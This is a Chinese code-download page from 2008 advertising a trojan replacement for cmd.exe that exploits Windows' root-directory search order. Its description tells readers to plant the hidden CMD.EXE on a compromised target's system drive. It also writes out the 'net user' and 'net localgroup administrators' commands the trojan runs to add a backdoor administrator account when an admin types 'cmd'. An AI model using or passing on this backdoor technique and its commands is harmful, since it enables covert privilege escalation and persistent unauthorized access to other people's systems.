文件名称:cmd漏洞源代码
-
所属分类:
- 标签属性:
- 上传时间:2008-10-13
-
文件大小:18.5kb
-
已下载:0次
-
提 供 者:
-
相关连接:无下载说明:别用迅雷下载,失败请重下,重下不扣分!
介绍说明--下载内容来自于网络,使用问题请自行百度
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
(系统自动生成,下载前可以参看下载内容)
下载文件列表
41
41/Readme.txt
41/cmd
41/cmd/cmd.cpp
41/cmd/cmd.dsp
41/cmd/cmd.dsw
41/cmd/cmd.ncb
41/cmd/cmd.opt
41/cmd/cmd.plg
41/cmd/ReadMe.txt
41/cmd/StdAfx.cpp
41/cmd/StdAfx.h
41/ReadmeNow.txt
41/黑色海岸线.htm
41/hacker.txt
www.dssz.com.txt
41/Readme.txt
41/cmd
41/cmd/cmd.cpp
41/cmd/cmd.dsp
41/cmd/cmd.dsw
41/cmd/cmd.ncb
41/cmd/cmd.opt
41/cmd/cmd.plg
41/cmd/ReadMe.txt
41/cmd/StdAfx.cpp
41/cmd/StdAfx.h
41/ReadmeNow.txt
41/黑色海岸线.htm
41/hacker.txt
www.dssz.com.txt
本网站为编程资源及源代码搜集、介绍的搜索网站,版权归原作者所有! 粤ICP备11031372号
1999-2046 搜珍网 All Rights Reserved.